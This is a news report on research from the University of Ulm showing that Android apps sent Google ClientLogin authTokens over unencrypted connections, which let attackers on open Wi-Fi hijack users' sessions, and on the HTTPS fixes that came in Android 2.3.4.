14 DAY TRIAL // Security researchers have discovered a vulnerability in Google's ClientLogin authentication protocol which allows potential attackers to execute session hijacking attacks against Android users.
The security hole was identified by researchers from the Institute of Media Informatics of the University of Ulm in Germany and builds on the findings of Rice University professor Dan Wallach.
In February, Mr. Wallach discovered that many Android applications sent data in clear form, a problem on unsecured wireless networks where attackers can freely sniff out traffic.
The Rice University professor concluded that "an eavesdropper can definitely see your calendar transactions and can likely impersonate you to Google Calendar."
"We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis. The short answer is: Yes, it is possible, and it is quite easy to do so," said Bastian Könings, Jens Nickels, and Florian Schaub from the German university.
"Further, the attack is not limited to Google Calendar and Contacts, but is theoretically feasible with all Google services using the ClientLogin authentication protocol for access to its data APIs," they added.
Much like with session cookies in browsers, when authenticating to Google's services from an Android app, an authentication token (authToken) gets stored on the device in order to remember the user.
These authTokens are valid for a period of two weeks and are susceptible to man-in-the-middle attacks when sent over unencrypted (http) connections, just as browser session cookies.
This kind of attack is the reason why major websites are pushing for full-session HTTPS. Some have already enabled this by default; however, things are lagging behind in the mobile services world.
An attacker who sniffs unencrypted traffic sent over an open wireless network can extract authTokens, put them into his own Android device and hijack people's sessions.
Starting with Android 2.3.4 Google Calendar and Contacts are using HTTPS by default, but only a very small percentage of devices currently have this version of the mobile operating system. In addition, even in 2.3.4, Picasa sync remains vulnerable to this authToken stealing attack.